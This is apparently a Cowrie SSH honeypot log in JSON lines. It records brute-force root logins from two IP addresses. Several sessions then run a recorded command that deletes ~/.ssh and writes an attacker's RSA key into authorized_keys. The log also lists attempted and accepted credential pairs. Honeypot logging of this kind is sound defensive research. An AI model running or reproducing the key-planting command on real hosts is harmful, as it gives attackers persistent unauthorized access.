{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40627,"dst_ip":"1.2.3.4","dst_port":22,"session":"87f7c6d5cd8f","protocol":"ssh","message":"New connection: 212.227.235.229:40627 (1.2.3.4:22) [session: 87f7c6d5cd8f]","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.128879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.130162Z","src_ip":"212.227.235.229","session":"87f7c6d5cd8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:10.157340Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.157981Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.158751Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.270012Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.514016Z","src_ip":"212.227.235.229","session":"87f7c6d5cd8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:10.600065Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.600932Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.717238Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.718058Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58031,"dst_ip":"1.2.3.4","dst_port":22,"session":"490245934276","protocol":"ssh","message":"New connection: 212.227.235.229:58031 (1.2.3.4:22) [session: 490245934276]","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.825717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.826950Z","src_ip":"212.227.235.229","session":"490245934276"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:10.936014Z","src_ip":"212.227.235.229","session":"490245934276"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:11.375418Z","src_ip":"212.227.235.229","session":"490245934276"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:12.096228Z","src_ip":"212.227.235.229","session":"87f7c6d5cd8f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:12.487763Z","src_ip":"212.227.235.229","session":"490245934276"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60801,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cef920ae7cf","protocol":"ssh","message":"New connection: 212.227.235.229:60801 (1.2.3.4:22) [session: 9cef920ae7cf]","sensor":"my-vps","timestamp":"2025-09-09T06:30:12.597543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:12.598495Z","src_ip":"212.227.235.229","session":"9cef920ae7cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:12.708889Z","src_ip":"212.227.235.229","session":"9cef920ae7cf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.195541Z","src_ip":"212.227.235.229","session":"9cef920ae7cf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.308477Z","src_ip":"212.227.235.229","session":"9cef920ae7cf"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.309361Z","src_ip":"212.227.235.229","session":"c3e4cee84c7a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.464381Z","src_ip":"212.227.235.229","session":"87f7c6d5cd8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40959,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad5f8c2012dd","protocol":"ssh","message":"New connection: 212.227.235.229:40959 (1.2.3.4:22) [session: ad5f8c2012dd]","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.837689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:13.838488Z","src_ip":"212.227.235.229","session":"ad5f8c2012dd"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:14.222800Z","src_ip":"212.227.235.229","session":"ad5f8c2012dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:16.787597Z","src_ip":"212.227.235.229","session":"ad5f8c2012dd"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:17.133797Z","src_ip":"212.227.235.229","session":"6f4d4a706c4d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:17.137951Z","src_ip":"212.227.235.229","session":"ad5f8c2012dd"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":56066,"dst_ip":"1.2.3.4","dst_port":22,"session":"893767d79e9e","protocol":"ssh","message":"New connection: 157.20.207.165:56066 (1.2.3.4:22) [session: 893767d79e9e]","sensor":"my-vps","timestamp":"2025-09-09T06:30:21.613354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:21.614195Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:21.798439Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.login.success","username":"root","password":"xiaoaojianghu","message":"login attempt [root/xiaoaojianghu] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:22.572112Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:23.032592Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.033261Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.034106Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.218599Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:23.604990Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.605709Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.792071Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.792944Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":59562,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bdb03f88485","protocol":"ssh","message":"New connection: 157.20.207.165:59562 (1.2.3.4:22) [session: 9bdb03f88485]","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.974493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:23.975314Z","src_ip":"157.20.207.165","session":"9bdb03f88485"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:24.159631Z","src_ip":"157.20.207.165","session":"9bdb03f88485"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:24.935898Z","src_ip":"157.20.207.165","session":"9bdb03f88485"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:26.122225Z","src_ip":"157.20.207.165","session":"9bdb03f88485"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":59572,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c3c264bbf5","protocol":"ssh","message":"New connection: 157.20.207.165:59572 (1.2.3.4:22) [session: 09c3c264bbf5]","sensor":"my-vps","timestamp":"2025-09-09T06:30:26.304878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:26.305610Z","src_ip":"157.20.207.165","session":"09c3c264bbf5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:26.489843Z","src_ip":"157.20.207.165","session":"09c3c264bbf5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:27.265318Z","src_ip":"157.20.207.165","session":"09c3c264bbf5"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:27.451901Z","src_ip":"157.20.207.165","session":"893767d79e9e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:27.453177Z","src_ip":"157.20.207.165","session":"09c3c264bbf5"}
